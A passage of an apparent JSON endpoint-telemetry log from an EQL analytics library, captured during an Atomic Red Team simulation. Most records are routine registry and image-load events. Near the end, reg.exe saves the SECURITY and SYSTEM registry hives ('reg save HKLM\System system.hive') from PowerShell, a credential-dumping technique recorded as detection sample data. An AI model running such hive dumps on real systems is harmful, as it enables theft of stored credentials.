"Disallowed", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "Windows.ApplicationModel.Background.TimeBroker.dll", - "image_path": "C:\\Windows\\System32\\Windows.ApplicationModel.Background.TimeBroker.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{8bc39637-a766-42a2-9fda-9233ca603049}", - "registry_value": "{8bc39637-a766-42a2-9fda-9233ca603049}", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{9d5ff1f4-87b5-45eb-b329-50153c699baf}", - "registry_value": "{9d5ff1f4-87b5-45eb-b329-50153c699baf}", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571692300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "Windows.ApplicationModel.Background.SystemEventsBroker.dll", - "image_path": "C:\\Windows\\System32\\Windows.ApplicationModel.Background.SystemEventsBroker.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "process", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "subtype": "terminate", - "timestamp": 131883571692460000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\HostActivityManager", - "registry_value": "HostActivityManager", - "timestamp": 131883571692460000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\HostActivityManager", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\HostActivityManager\\Volatile", - "registry_value": "Volatile", - "timestamp": 131883571692460000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883571749180000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883571749180000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883571749180000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "file", - "file_name": "REGC0BC.tmp", - "file_path": "C:\\Users\\bob\\AppData\\Local\\Temp\\REGC0BC.tmp", - "pid": 6700, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "timestamp": 131883571774800000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" - }, - { - "event_type": "file", - "file_name": "REGC0BC.tmp", - "file_path": "C:\\Users\\bob\\AppData\\Local\\Temp\\REGC0BC.tmp", - "pid": 6700, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "timestamp": 131883571774800000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" - }, - { - "event_type": "file", - "file_name": "security.hive", - "file_path": "C:\\eqllib\\atomic-red-team-master\\atomics\\security.hive", - "pid": 6700, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "timestamp": 131883571774800000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" - }, - { - "event_type": "image_load", - "image_name": "ntmarta.dll", - "image_path": "C:\\Windows\\System32\\ntmarta.dll", - "pid": 6700, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571774800000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 6700, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571774800000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" - }, - { - "event_type": "process", - "pid": 6700, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571774800000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" - }, - { - "event_type": "process", - "pid": 132, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571774950016, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001016D25001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg save HKLM\\System system.hive\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 3020, - "ppid": 7036, - 